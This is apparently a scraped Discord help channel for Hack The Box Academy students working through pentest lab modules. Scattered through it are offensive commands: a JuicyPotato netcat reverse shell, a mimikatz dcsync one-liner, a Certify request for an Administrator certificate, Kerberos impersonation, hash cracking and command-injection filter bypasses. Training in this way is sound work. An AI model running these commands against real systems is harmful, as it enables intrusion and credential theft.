#modules

you mean <!-- ? it's to comment the rest of the stuff out, it's explained in the section

why is it stored under debug?

because the compile settings defaults to debug, you can switch to release

I wouldn't recommend using dotnet to build on linux, it will likely work but it's iffy, build with visual studio would be the best

Yeh I just figured out why, that should have been the giveaway that it was single quote and not double

Thanks

Yeah windows doesn't like .exe compiled on non-windows systems

its on my windows host powershell

Even if they're the exact same

I messed up windef is deleting it

Well... yeah... it's a hacking tool lmao

Just add that folder to exceptions in defender

also, make a dev vm to build tools

for popular tools they're most likely safe, but you never know what's in the projects

I'm seeing suggestions to use secretsdump on the AD Skills Assessment to get the tp***y username's cleartext credentials. I tried lsass.dmp and that did not give it in cleartext. It looked like the secretdsdump.py was to be used on a machine with python installed

How am I supposed to use secretsdump on this?

will do that

Even if I get a shell on the system instead of using rdp, I don't see how secretsdump.py would work since there's no python on the target machine.

I mean extracting the dmp and system save, should be trivial from there

you need a different tool for lsass

secretsdump indeed does not read lsass dumps, the right tool has been mentioned many times in the windows related modules

pypykatz hasn't given me anything from the lsass dumps

I have the answer since I used LaZagne, it just doesn't tie it to that user

I told you last time it came up. One of the great things with secretsdump is you can run it remotely

the target doesnt need python

you run secretsdump on your host

If you have the answer, but it doesn't tie to the user. Then you don't have the answer

It showed up under "default password" so I'm assuming there is an alternative method that shows the password tied to user

I'd do what madf0x suggests

default password is just a field for storing login creds

how do I do that?

secretsdump -h

Read the tool documentation

so far everything I've read is for dumping hashes

I've been told it's stored in plantext and that I shouldn't have to dump hashes for this

It'll dump everything

including hashes and plaintext

As a wise man once said "reading the card, explains the card"

Hi

Ran this

I would like to start learning any suggestion on what programs I need on my computer to start learning on the website?

Got this

hi folks, having trouble with Kerberos Attacks module, lesson "Constrained Delegation from Linux". When I run the command "getST.py -spn TERMSRV/DC01 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd$' -impersonate Administrator" I get the error: "No such file or directory: './DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache' ". Anyone can see what I'm missing?

A linux virtual machine and the will to read a bunch

I'm on the machine in rdp so I know my proxy is set up

How could I get that?

read the -h what's -just-dc flag for?

Google

Academy also has a "Setting up" module

What do you mean?

have you set the right env variable to the ccache?

All I see now is

Introduction to Academy

I just wanna make sure everything will be ready so I won't face any issues tomorrow

If you've never touched a linux device before: there's a ton of fundamentals you'll need to learn

Aside from that there is the in-browser vm you can use

that was what i was thinking. But where am I supposed to get that env var? from the previous lesson or just from the example in this lesson?

I know that but basically It's my first time going into that stuff, I wanna learn.

Just take a second, take a step back, and just do it

if you're authenticating using creds then unset KRB5CCNAME

Do you mind telling me what's the first step I need to do?

I took out -just-dc

Since I don't have any experience with linux

Read the module and sections

I saw that as an option I had run before, so I tried it

The intro doesn't do anything crazy

Introduction to Academy

Yes

You mean to that?

Am I doing something wrong?

Yeah I know it's nothing crazy yet but I just wanna make sure I will have all the programs I need to start learning

Ok, that worked, thank you! can you explain how and why please?

The only "programs" you need on your base computer are: a web browser, and a virtual machine software running linux

There's literally thousands of articles

The VM software there's any for free or I need to buy one

Idk how it works tbh

Virtualbox is free

you have a ccache set before, probably have deleted the file so impacket complains that it's missing even when you're authenticating using creds, just remember to unset it once you're done with it

Also a good portion of your questions can be googled

Do you mind to send me a link please?

No, learn to use Google

It's not hard to find

gotcha, cheers!

Linux distributions?

Yes, like Kali, Parrot, Arch, Ubuntu, Gentoo...

Bunch of them out there

Alright

Parrot and Kali are popular for pentesting

I don't see secretsdump.py remote operation covered in any of the modules. Is there a good resource for this?

It isn't working remotely

​Oracle Linux 9 / Red Hat Enterprise Linux 9
​Oracle Linux 8 / Red Hat Enterprise Linux 8

The newest one right? @fathom pendant

google. both of you

I wouldn't suggest redhat

just read setting up module lol

^

Ubuntu 22.04

There's literally a setting up module you can do after you get through the intro to academy

That goes over basic setup

It looks like secretsdump is covered for dcsync, but not for plaintext hashes

Alrighty, thanks!

Man I used Google and found an example command in like the first couple links

Literally only googling secretsdump remote

Can I DM you the command I used. I don't want to give spoilers for previous creds

I haven't done this yet

So no

I'm just stating, I used Google and found something

Keep getting the same thing:

I used impacket-secretsdump <username from quetion 2>:<pw from question3>@172.16.6.50

If you have a proxychain setup, I'm assuming you're using that

yes I am

oh wait

I guess I'm not

👍

Thanks

Yeah my syntax worked, just had to do proxychains, haha.

I got the cleartext pw!

secretsdump is bae

netexec can do the same thing btw --sam --lsa but pretty sure it's the same thing beneath the hood

Or at the very least super similar

Rebuild the JAR file by following the same steps and log in again to the application. Then, navigate to FileBrowser -> Config, add the fatty-server.jar name in the input field, and click the Open button.

I like secretsdump formatting. But I havnt tried netexecs version in a hot minute so maybe theyve done a formatting update since I last used cme for that task

anyone know how to get someone ip adress by emial

Google

how

I never hack before

afaik the format is the same, took a quick look at the code, they're calling the same dump() function

google

what google

????????????????????

search the same question you asked here, in google

but I searched

cant find good

Read #rules and #welcome

Phishing and ip grabbing for the purposes of doxxing/and or hacking them is an illegal act, we won't be helping you

then I am leaving

cya

Hi all, I'm still stuck on the "injection attacks" skills assessment. I would be so grateful for any advice or hints. I can't seem to get the xpath injection working, nor can I work around the size issues with the iframe which crops the content I need. Please reach out if you are able to assits. Thanks in advance.

heyo i can help if you need

would anyone be wiling to solve another conundrum please? I've done import-module powerview.ps1 (the script version that is on the host as per exercise), however it doesn't seem to have any functions (cmdlets). Why can that be?

sometimes it doesn't import correctly, try again, reset the machine or upload your own copy

did you change set execution policy?

Did you import it from the tools directory?

yep

Also some power view stuff relies on Active Directory, did you also import that?

You can just Import-Module ActiveDirectory from anywhere

I'll give that a go, thanks!

Nope, haven't thought of that, cheers!

That didn't work actually, couldn't find the module

Weird

It should just work

yep, i guess I'll just reload the host

I know, right? Even when you list the available modules it shows the powerview and all but the version is 0.0 and has no commands shown

Yeah try resetting the target

this doesn't always work for newer windows server versions

what to do in that case? find the .ps1 of it?

https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps

It's worked every time for me on the windows lab environments

but sometimes windows labs are goofy ¯_(ツ)_/¯

it should be in the OS by default for that lab

#boxes , or if it's a recent machine it'll have its own dedicated channel. Read #welcome

I was asking more for in the wild

#for non servers
Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online

#for servers >= 2012
Install-WindowsFeature RSAT-AD-PowerShell

#for servers < 2012
Import-Module ActiveDirectory

Second part of my statement

Great, I'll note that down, cheers!

the versions aren't always accurate, usually I'll just try all 3

I start with import then cry

<@&861185840277487616>

Honk honk

Kek

No

@fathom pendant @next bronze Just a quick update: restarting of the target has indeed solved the goofy behaviour, thank you for your moral and spiritual support throughout this uneasy moment

go drunk, you're home

Hey I just cleaned up another bad account

help me plis What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

well; are you logged into the domain controller?

if not: that's your first step

yes

one of the sections talks about searching windows event logs

I already did it and used this filter. Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4625} -MaxEvents 50 | Format-List TimeCreated, Message

then just search the list, the timestamps are good to get an idea of breaks

literally read the log

also by DC i mean the 172.x.x.x server that was mentioned in an earlier question

oky thanks

how do i contact support the updated section of this module is convuluted and after 3 days im still unable to proceed got the rest of the module complete just cant get past this damn fatty reversing

green bubble on the website

:) if you don't see it: you'll need to disable adblock

Hi guys, I'm currently trying to figure out why my hashcat unable to crack the root password using mutated_password list. I check my unshadow file it contains the hash. This is from Password Attack Passwd, Shadow & Opasswd.

are you using the right mode

└─$ hashcat -m 1800 -a 0 unshadowed.hashes ~/Downloads/Password-Attacks/mut_password.list -o unshadowed.cracked

yeah i sent a message to someone using that 3 hrs ago and it hasnt been seen

this is the same command from the section

also: since there's a handful of accounts there: it'll take a while

it was exhuasted

try just putting the root hash into it's own file and run that on it's own

also try rockyou.txt

remember if one doesn't work, use another

With that I'm getting separator unmatched

are you copying the hash itself or the whole root:...:/bin/bash line

no, just the the whole root...<snipped.>..bin/bash

1800 should be the right mode as it starts with $6$ i believe

copy the whole line, probably missed a : somewhere

Let me double check

Thanks @fathom pendant and @next bronze for catching my mistake 🙂

np; in this case since you only needed one of the hashes you can just kinda skip the rest

I mean having other hashes in there wouldn't make it slower

rarest badge lol

Hey guys,

In the Password Attacks submodule "Protected Files", where am I supposed to find this "cracked password of the user Kira"? The submodule seems to imply I've obtained this password in the past, but I looked through my notes and the previous submodules and came up short.

I found some note concerning the password "||LoveYou1||" and have tried a mutated list off that + hydra with no luck.

lowercase

but also yes: you should have had her password for the credential hunting portion

Awesome figured it out. Much thanks.

Could someone help me understand the breakdown of this hash, the module I'm doing asked me to paste in the NTLM hash of this user and I had to keep copying and guessing which portion of this was the correct answer but I'd like to understand the different parts so I know for next time.

user:id:lm:nt

when you do PTH you're passing the NT hash

also it's still a spoiler as you're posting the answer

Sorry about that its been a late night should've been more careful

you can do * to indicate missing parts i,e, kh*:1138:aa*:4b*:::

So if a question asks me for the NTLM hash I should be focusing on the NT portion is that correct?

those that have done the assignment can tell you; but anyway one of the earlier modules in the path (i believe Password attacks) breaks down the windows NTLMv2 hash

Yeah I remember it I just lost access to my obsidian notebook and didnt want to go through each module to try to find where that was

correct: the lm version is a significantly broken down version of the NT

Ok great thank you appreciate it

LM removes all uppercase

it's literally all lowercase and some special characters

NT has a wider range of characters

What if you wanted to pass this through hashcat, you'd do the NT portion?

generally you can pass the whole response to hashcat

as hashcat will likely attempt to crack the LM portion first: then use the LM crack to crack NT

Ah okay makes sense

it's only like a handful of hashes that hashcat doesn't like the full thing

but hashcat i believe looks for all parts of it

Awesome thanks a lot

sucks that you lost access to your notebook

did defender yeet your notes? ¯_(ツ)_/¯

if so: adding the folder to exclusions prevents defender from scanning/deleting

My cat threw up on my laptop and fried something no clue what Im hoping just the battery but preparing for the worst. Waiting for an external SSD enclosure to arrive tomorrow from Amazon and hopefully the SSD is fine and I can access my data

if not: you can try and see if you can take it to a data recovery service

Yeah I'm hoping that won't be necessary I didn't find any moisture inside the laptop when I opened it up to take the battery out and SSD everything looks normal tbh just wont charge or turn on

how do I connect to the windows target?

https://academy.hackthebox.com/module/158/section/1427

might be crazy what i'm about to say: but pivoting

I am on the victim server ubuntu.

I mean how do I downlaod the rev shell on to windows

i implore you to read the section: i believe the section walks you through ALL the steps

created payload on my attack machine sent it to ubuntu machine

also should be able to just ssh from the ubuntu host to the windows host

:)

You can use pretty much any of the file transfer methods that are outlined in the file transfer module, I used one of the most basic file transfer methods for this part if I remember correctly

YO One of us!~ I'm also 1 of the 8.

Your answer on how to send this to the windows machine is right in the image you posted

you're misunderstanding the issue

I am comfortable with transferring. what are the creds I need to login into that windows machine

the issue they're stating: is that they cannot download the exe without being on the windows machine

Oh I see now what the question is my apologies

I need coffee clearly ☕

use a second ssh session to go from the ubuntu host to the windows host

That was a fun time

¯_(ツ)_/¯

you can answer the question technically without doing the method

and tbh this is one of the more annoying setups

I did the quiz. I am trying to replicate the section

like there's a reason most of us that have used/understand it: use ligolo-ng

it takes a LOT of the tedium out of the more annoying stuff like this

the goal of this is to technically just have the second host communicate back to your system via a listener to create a shell session directly

instead of a -> b -> c you just have a proxy connection a <-> c

I'd have to go back for pivoting, but anything like sshuttle or proxychains or dynamic p-forwarding was nice. Networking theory is important here.

and then you find out about ligolo and proxychains looks like a chump lmao

ligolo works on a different network layer than proxychains

Ok now I'm going to have to go Google ligolo

Same

there's precompiled binaries for it

agent/proxy: proxy iirc is for YOUR system, agents are for the victims, the documentation clears it up

Thank the programming lords

Damn this tool looks great

there's 32 and 64 bit binaries for each OS

and Agent/Proxy for each OS

the man really said "fuck it we ball"

We ball

Adding to my toolset

It looks so simple too I almost want to go back to the pivoting section and only use ligolo

Right?! We've been tormented.

the only mildly annoying thing is the double-pivots

Traumatizing^^

this tool didn't exist when they made the pivoting module

Tru

If I never have to double pivot again I'll be quite content lol

you still have to double pivot

it's just slightly annoying to set up

https://tenor.com/view/if-you-think-of-an-gif-20132469

Cruel. How brutal

i mean the simple answer is just creating a new tun interface for every pivot hop you need to do

the dumber thing is

initiate a new session after it connects
close old connection, switch to new session, start

the older versions seem to have an autoswitch feature, which i'd like him to bring back

but now it just says "that interface is already in use"

:(

So you'd recommend ligolo-ng right just want to make sure I'm looking at the right one on GitHub

they were using the creds from the previous section. Probably should have mentioned there itself
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Yeah I've made this mistake a bunch of times, I realized every time you see creds on a section just copy them to your notes lol makes life a lot easier

ok? still need a connection to pivot through :P

I understood the whole thing I was searching for creds like a madman lmao

LMAO

it helps if you provide context for why you're stuck brother

instead of us assuming you're failing to read

:^)

yep should have phrased it better

"I don't know how they want us to connect"
Uh... pivot?

I'm happy we misunderstood, wouldn't have learned about ligolo otherwise 😂

I still would have recommended ligolo anyway

:P you don't need to worry about proxychains and it being dumb

you can do all sorts of things with it

including: scanning a target with nmap without it yelling about ICMP requests being ignored

(though against windows targets, usually those get ignored anyway)

does lingolo support syn scans or we need to enforce full TCP connect scans like for proxychains to not complain about partial data

i believe it supports syn scans

as i said earlier; it works on a completely different layer of the stack

Aye, agreed

Gamers I am back with the same XSS/XSS Attacks/Phishing module https://academy.hackthebox.com/module/103/section/984, I got the payload working, I tested it locally and I get the credentials with the form but whenever I try to send the url in the /phishing/send.php form the exercise says I get a Issue in sending URL! error, any ideas?

i mean if it's being flagged as phishing: then it's doing it's job

have you considered NOT doing something illegal and phishing?

#rules and #welcome

<@&861185840277487616>

:) what i was saying is; you're not gonna get help with illegal activities

not in this server

try asking google

FBI OPEN UP 🚓

Fired them out of the server

with a Canon?

With 🔨

https://tenor.com/view/smash-bros-melee-super-smash-bros-melee-bat-homerun-homerun-bat-gif-26180968

anybody stuck on the part where you download the fatty server in Exploiting Web Vulnerabilities in Thick-Client Applications leave out return "Successfully saved the file to " + desktopPath;
}

Apparently it might be the IP in the payload? The page accepts de URL when I dont input my IP

Is anyone able to give me some pointers for the NoSQL injection skill assessment 2? I found the injection point, but I am not sure where to go from there.

Man I hate it here, my payload works but the url form is just wonky and I cant get through the question

And the pwnbox is extremly unstable get me out of this module dude

Any body having big issues rdp into target? I’m doing the shells live engagement module and I have been able to connect maybe twice in the last two days. Keep getting connection error and when it does connect slow as! Then disconnects

switch to the tcp connection

hey i have learnt the bare basics of hacking, how do i continue, is hack the box free version enough

i mean the labs site for free is good, if you wanna learn more: HTB-Academy is not free for content above tier 0

there is a pentesting path for their CPTS exam that goes through a lot of the minimum for testing a networked environment

Academy is very affordable if you just do it using cubes over time. Man I’ve learned so much from it. Definitely worth it.

Tried that unfortunately. No luck.

change vpn regions then?

Yeah done it all

¯_(ツ)_/¯

Just thought maybe somethings down

sometimes it just does that

has periods of being really slow

I’m relatively new to it so not sure if that’s like a common iccurance

Ok cool. Maybe just a break is needed haha

it's not common, but it does usually happen when you're getting into it

That’s be right

Thanks anyway

can someone help me? when i use this comand ./socatx86.bin TCP-LISTEN X.X.X.X:1234, fork X.X.X.X:1235 gives me this error "./socatx86.bin: /lib/tls/i686/cmov/libc.so.6: version `GLIBC_2.15' not found (required by ./socatx86.bin)"

sounds like you need to compile socat statically

i tried to add at the end of command -static but doesn't work

you mean when you compiled it? or when you're running it

compiling and running are two different things

when i run it

compiling means that you are making the binary read to use: not using it

how to make it

so did you download the binary precompiled?

i download the binary from github

then it's likely you downloaded one for an older version ¯_(ツ)_/¯

the machine when i try to execute is older ubuntu

idk what version of socat should i download

i'm sure the section tells you how to do it

Can I verify with HTBacademy? #welcome redirects to OG HTB for identity verification so confused

either that or you're doing something unnecessary - socat may already be installed ¯_(ツ)_/¯

you cannot verify with academy

unfortunately, you cannot verify with HTB Academy account

they are all separate platforms: for now

you will need to create an account on https://hackthebox.com/ if you don't have one already

Okay gotcha thanks

BTW is it only me whose pwnbox gets "minimized" everytime I switch the tab only to refresh to get it back to fullscreen?

nope

that's just a thing because the size is pulled from the interactive window on the page loaded

it's a pain

one way to not have to deal with that is setting up your own vm ¯_(ツ)_/¯

ahhh..okay. I thought only THM had this issue but apparently both does.

it's just the nature of using a vnc

@fathom pendant is there any other way instead socat beacause nothing work with socat

if im in shell instead socat can i use other tool

pivoting module yeah?

for linux

that wasn't my question

ive complete this module but they show only socat for redirecting

you can pivot and redirect with most tools

i'd suggest learning ligolo-ng; it works way better

and isn't as dumb

i will try

attack n defense -> PKI - ESC1

Connect to the Kali host first, then RDP to WS001 as 'bob:Slavi123' and practice the techniques shown in this section. What is the flag value located at \dc1\c$\scripts?

how to find out the IP Addres of WS001 in order to RDP in at kali cmd?
For this module, they provided the IP Address to RDP into kali, which i have already RDP in.

the internal ips are listed in one of the first two sections where they talk about the lab environment

@fathom pendant ive exploit one machine and establish a shell connection after that i exploit exploit a buffer overflow vulnerability on third machine and establish the connection from third machine to second with netcat listener my question is how can i use metasploit instead of normal shell

after i background the session i lost the netcat connection

and instead i background the connection with second machine

okay thanks. works

you need to set up hops and listeners along your path, i haven't used metasploit for doing multiple pivots: nor do I know what module you're explicitly talking about, I don't recall any buffer overflow in the course

i give it as an example

i tried to use socat to redirect to multi/handler and then to use shell_to_meterpreter module in metasploit to upgrade to meterpreter shell but as i said the socat gives me errors and doesnt work

i don't have experience with socat or meterpreter/metasploit enough to be of help here dude ¯_(ツ)_/¯

unfortunately I havent found any solution for this, guess I have to live with it.

attack n defense -> PKI - ESC1

they mention to run this command and get a cert.
.\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administrator

but i cant seem to find the cert.pem is located at.

am i suppose to save the text of the -------START CERTIFICATE ---- AND END CERTIFICATE into a text file n to the share folder?

Yes, it only prints the cert and you have to save it manually afterwards

no: read #rules and #welcome

<@&861185840277487616>

i got this error. i have the cert.pem in my kali side.

Could not read private key from -in file from cert.pem

Means you copied it not completely, include the top line that starts with ——

i did include though.

did you run the command listed in the module afterwards to clean up the file?

do you mean this ?
sed -i 's/\s\s+/\n/g' cert.pem

yea

if it doesn't work just try redoing the steps, if you miss a single "-" or character somewhere it won't read correctly

help meeee please ^^"

Pivoting, Tunneling, and Port Forwarding
Dynamic Port Forwarding with SSH and SOCKS Tunneling

Hello I’m new here

You typed it wrong, not proxycchains

good morning 🙂

Hey

I just started HTB academy and somehow I can't start a new instance

Does anyone have any solution/

I'm currently in the tutorial section yet

interactive section with target

ACTIVE DIRECTORY ENUMERATION & ATTACKS
Enumerating & Retrieving Password Policies
1.What is the default Minimum password length when a new domain is created? (One number)

I dont get how to find it

afaik its accessible via google

but it should be in the text

shouldn't just give the answer, it can easily be googled

changed it

I initially thought I should use the tools provided in the module to find it. After searching on Google, I found the answer on the first page. Thank you very much.

give more info, what do you mean by that

PMs

just answer here

I sent you a picture

I can't send it here

you can get verified by reading #welcome , or just describe the problem

Hello. Does anyone give me some advice?

Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
Question: I'm working on the exploit at the file upload page.
When I simulate it myself, it actually works well. But admin never access it (there is a mention that admin will access it).
Is this the intended behavior?

Basically I cannot open new instance on the website

I was trying to answer a question on the introduction

what instance? the target?

My Workstation

Free users are allowed 1 Pwnbox spawn per day. Get unlimited Pwnbox access by either subscribing for any plan or buying any amount of cubes in Academy's billing page, https://academy.hackthebox.com/billing

well that's exactly what it says, you have reached the limit of your pwnbox spawn for the day

So it means I cannot learn?

learn how to set up a vm and using vpn , you can evertime 🙂

Mind sending me a link for vm?

dude, we've answered that question earlier

google : parrot or kali in vm

^

you can still continue with the module content, just that you cannot start another pwnbox for the day

I haven't reached that yet

hacking is 90% troublehooting and problem solving 🙂

hello I really got stuck at windows privilege escalation credentials hunting. Can someone please help?

you won't find passwd or pass or pw or pwd like this

maybe something to try as well

I'm stuck on the part 1 of the windows privilege escalation skills assessment. I've managed to get a reverse shell but I can't exploit ||JuicyPotato|| as I get an error ||related to an invlaid CLSID||. The command I'm running is
||```
./JuicyPotato.exe -p c:\windows\system32\cmd.exe -l 6666 -a "/c c:\users\public\nc.exe <attack box IP> 8444 -e cmd.exe " -t *

Anyone have any hints on what I'm missing? I've tried ||printspoofer and RoguePotato|| and still get similar errors/no privileged shell.

found it

you may have to try different CLSIDs depending on Windows Version and whats running, you can provide a CLSID with the -c parameter
Check https://ohpe.it/juicy-potato/CLSID/ and see what applies to you

any hint how i can stabilize my icmp tunnel ?

or is the network still "laggy ?

I found a valid CLSID but I don't get a reverse shell.

ok got the flag ... pita lol

ayo

am kind a stuck with

last question of pass the hash

i am just not getting the rev shell on the nc

listener

the mod is password attacks

OK managed to find another valid CLSID which finally worked. Thanks for the link!

it may help when you can provide links

yea its a bit trial and error with juicypotato

https://academy.hackthebox.com/module/158/section/1439

is antivir on purpose ?

it alöways deletes my dll

nothing prevents you from stopping it

ok 🙂

<@&861185840277487616>

OMG Broooo

Taken care of

solved , do not wanna spoil

only in 1 module

thx i will look into it later 🙂

got it

Yeap and when I do it's kicking me out of the session every few minutes

icmp section ?

Yeah!

i had the same

only in this section

rdp "crashes" whwn ssh section breaks

I'm on the part 2 of the windows privesc module assessment and my RDP session keeps disconnecting as well. Possibly a temporary platform issue?

I am doing skill assessment 1 from ad enumeration module. I uploaded the rubeus and mimikatz bin to the foothold but I am having trouble using them from a webshell or a rev shell any hints as to how to approach it?

the issue is that the tools make my connection time out so I have to regain the shell session

when I try to run the mimikatz script my shell gets stuck

Just after many resets and some patience it kinda worked enough for me to finish that section

mimikatz tries to run interactively, which doesn't work well with rev shells. You can start it like this to execute whatever command you want and then exit, which should hopefully not mess up your shell ./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

thanks will do that

Hey all
Question regarding Footpriting/IMAP.
I figured out all the flags, but I used the ||robin:robin|| credentials mentionned by others on the chat. I still dont understand how I was supposed to find these creds. Is it just by assuming that the ||robin|| SMTP user is also an IMAP user with a weak password?

always try user = password

and try every possible user , users like to reuse their password

its even worse in real pentests 😄

IMAP and smtp are both E-Mail related protocols, so it’s kind of safe to assume it’s the same credentials between the two

command injections: Bypassing Blacklisted Commands. tried different things to pass the cat filter.
${PATH:0:1} ${PATH:1:1} ${PATH:2:1}
c'a't
%63%61%74
But no catting so far, or i missed the flag.txt by wrong navigating. Anyone any nudges or hints?

Ok makes sense, thank you guys

Invoke-WebRequest -Uri http://10.10.15.107:8000/upload -Method POST -InFile "hashes.kerberoast" why is this powershell upload command not working?

I tried using the full path too. I double checked the file exists

Could be completely wrong but I’m not sure simplehttpserver supports file uploads like that, I would try transferring via other means or creating your own file receiving script using http.server

There is also an upload http server you can use with python and a Poweshell script to invoke a web upload

Netcat is always a good option

Your question has nothing to do with the Academy. Better ask in the channel #boxes
If you don't have access, read and follow #welcome

Appreciate it, will remove question and check out the channel 🙂

@snow ridge did you figure this out?

Yup

any tips?

same issue as you

Check every parameter and test for blind

how to hack

girls ? computers ? toasters ?

just dont do it, hacking sucks and you just question life

if this is the regular python3 -m http.server - I dont recall it supporting file uploads/Post use the upload module with python3 -m upload then you could snd the file with invoke-fileupload

step 1: buy a hoodie

step 5 : drink "mate" tea , sorry it was misleading before

step 2: install kali

you or bill gates I dunno who's worse

we all have hoodies @ work 🙂

got it thanks for the help

thought i tested every param, just didnt notice the blind

Guys do u have discord server for ine ctf challenge?

Is there any writeup on "Crafty"?

its playing MC 😉

its not too hard

then why tf is this server created

bro im just goin thru it

its about modulo 😉

tf is modulo

% ;=

sorry i was joking , what is your real question ?

how to learn legal hacking

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

have you made a htb academy account yet?

no

gonna just shamelessly plug this right here then: https://referral.hackthebox.com/mzwxkRC

youll want to make an account tho fr

htb academy has great beginner paths to hands on learning

i did

bro these tier 3 & 4 modules expensive lol

https://tenor.com/view/doja-cat-star-wars-gif-25078126

wnat are these questions

the right one seems to be a hacker

What service do we use to form our VPN connection into HTB labs?

what is this

solve them

google them , learn, repeat

idk how

learn how to solve "problems"

I kerberoasted the account for the task "Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer " and got the ticket but how do I get the account name

how to understand the flag of an ip aress

I would suggest watching chris geer's wireshark tutorial

yea

you need to pray to illuminati

they will handle the rest

yea neither is illuminati

but be careful

praying to illuminati comes with its own risks

dude I am serious

no one here will discuss illegal activities on this discord server, see #rules and #welcome .

ask anyone here

https://tenor.com/view/illuminati-eyes-shaking-gif-12355978

oh no the eye

ok time for prayer

I cant stop looking in the eye

dude I have eyes now

but no joke there seems to be a exploit for discord floating around ... not so funny

the illuminati or something more nefarious

yes

any help here plis

BH dump available ?

nope

seems i have some time 😉

Performing ping sweep for IP range xxx.xxx.xxx.xxx/16

@unique swift

Study the "C:\Rules\yara\shell_detector.yar" YARA rule that aims to detect "C:\Samples\MalwareAnalysis\shell.exe" inside process memory. Then, specify the appropriate hex values inside the "$sandbox" variable to ensure that the "Sandbox detected" message will also be detected. Enter the correct hex values as your answer. Answer format: Remove any spaces

Anyone?

What's your question?

my question is why is this not working?

did I do something wrong? the question was Submit the contents of the flag.txt file on the Administrator desktop on MS01

Hey

Wrong channel: #starting-point

thanks, i'll delete it from here

This channel is for academy modules, the starting-point boxes are machines

Is it possible to encode the payload in base64 in command injection module?

So far it only gave me errors, to be sure.

You'd need the payload to be decoded and executed

yes

Could you give me some advice for Bypassing Blacklisted Commands, command injection module. Im stuck for a while now. I can execute system commands but i cant find the flag or ls other dirs than current directory. What do i miss?

the section covers these methods

bypassing using other characters for example

I did try that and i can ls in current dir, can route to another path but then i get no output. whoami and cat etc are filtered but know how to pass that. I'm missing something but cant see what

i’m assuming the flag is in the root dir /?

Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.

No 🙂 /home/1nj3c70r/flag.txt i would say

1nj3c70r was the username found in the question before

what a journey times 5

through the looking glass

*** -> *** -> *** was a bit slow 😉

but again learned a lot

next : Active Directory Enumeration & Attacks

glgl

Hi guys took some time off from academy , could someone remind me where I can find the password whn I want to ssh into the server as htb-student?

usually the password is given on the section

generally right above the first question

Dont really see on for the service scanning section

nmap module?

for a lot of the stuff, unless you need to ssh into the service to answer questions: you won't be provided creds

a lot of the NMAP stuff is definitely done strictly from the attack box

could be confusing sshing in with starting the vpn service on a VM

Yeah the nmap section, the last question is :
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
But I take it we dont need to ssh into the target to do this

smb is its own service so no

Ok thanks guys!

ah the user bob is given in the section

you get bob:{password}; read the section carefully

Oh I missed that, thanks 🙂

yep: reading is really helpful for a LOT of the modules

try {ISF},{ISF9}

or *>cat

"cat" is filtered. not allowed

tee ? head ? less ?

/bin/cat

head, less and /bin/cat are filtered, tee shows only ping results (just like some cat functions do, no output, no error).

hm

have you tried using the path trick to construct the cat command

it works for constructing any word if you can find the right offsets, not just their given examples

Yes, and some cat variations do work (at least no invalid input error) but i dont get any output from the .txt file, ping results are shown so everything seems to work

are you 100% sure the name of the file and the path is correct ?

tried it with /etc/passwd ?

Hello, im doing medium lab in Footprinting module

Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.

i got ** creds but i cannot use them on db, any suggest?

yes, see my screenshot.

hmmmm

i would expect an error or output from the text file but i when i dont get an invalid input error, it only shows the ping results.

i believe there's an important file, perhaps on a fileshare

in any case: running as admin solves a lot of problems

ive tried but i havent admin pwd

yes you do

if you have the important document: you have the password

what

that pwd doesnt work

yes it does

swear to god

i ve done this some days ago and everything worked

i swear to whatever higher being helps you sleep at night

Can you exfiltrate the source code of the ping site you are using? That would allow you to see what exactly is filtered and work around it

AHAHHA

fun fact you can rdp with those creds if you swap the username for a built-in windows account

nvm im just stupid ive prob missclicked smth before

via source i can see it needs to consist out of 4 octets, numbers only. The rest is done at the backend it seems.

tysm

oh cool thank you

as you will go deeper into the path it gets way more "suspicous" 😉

and many "aha" moments

many facepalms

that was the word i weanted to say lol

of "oh... it works like that?..." after trying to overcomplicate the hell out of it

...

erm yes

let's not be fuckin weird

not my cup of tea 😄

htb is makin me yk

idk, nor do i think i wanna know

<@&861185840277487616>

can we give this man the muted role of public shame??

https://tenor.com/view/shame-go-t-game-of-thrones-walk-of-shame-shameful-gif-4949558

Hey guys.

I made a share on my kali and now I use this command on target windows to access share but its not working:

copy \\10.10.15.54:4444\home\htb\aaa C:\

U have any idea why its not working?

any idea why ligolo is running on the server?

because you're fundamentally misunderstanding how it works

proxy is your host system: agent is the victims

yes agent is on the rev shell proxy is on my local

i guess i'm misunderstanding what you're asking

are you asking why it isn't running?

yea

that's a very different question lol

I am in the skill assessment in ad enum

So what's the problem

did you follow the documentation on chisel?

did you get windows amd64 agent?

my bad I forgot "not"

only other thing I can think of is maybe the port is simply not open

SMB can't arbitrarily choose a file location

you can try to run ligolo over a different port like 80/443/53/22

I am unpacking chisel now

you need to read the syntax for smb shares, your entire command was just wrong.

you tell SMB which file/directory you're sharing, you can't access the root of a fs from a share (unless you're hosting the smb share in the root directory)

I tried:
copy \\10.10.15.54:4444\home\htb-ac-519917\htb\aaa C:\Users\htb-student\Desktop

The problem is that when I used that command. I get:

"network path was not found"

I mean are you running SMB on port 4444 on your system?

Is it unzipped correctly?

but second: that's not how smb works

yes

i mean; there's precompiled binaries my dude

Bro can anybody help, I did Netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.214.104 when working on Port Forwarding with Windows Netsh and my computer is completely broken. I am no longer to access the internet at all. And yes I checked internet options LAN settings and no there is no proxy server for my lan like every YouTube video says

yea I did download the windows binaries but its missing the .exe extention

don't dm me without asking @raven lagoon

I was just following the module's commands

i doubt the module had you use that syntax

No it didn’t, but I had 4 hosts and since it wasn’t working at all and didn’t expect that command to destroy my computer

... that syntax is WILDLY different from what you're trying

